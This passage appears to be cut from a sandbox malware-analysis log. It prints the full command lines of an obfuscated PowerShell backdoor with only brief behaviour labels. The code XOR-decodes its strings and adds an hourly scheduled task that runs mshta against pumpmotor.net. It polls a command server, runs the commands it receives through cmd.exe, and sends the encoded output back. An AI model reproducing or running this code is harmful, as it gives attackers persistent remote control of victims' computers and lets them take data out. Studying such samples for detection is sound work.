[System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj;
cmdline	"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 60 /tn Office\option\update /tr "mshta http://pumpmotor.net/editor/smartoption.php" /f

Installs itself for autorun at Windows startup (3 events)

cmdline	PowerShell $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function 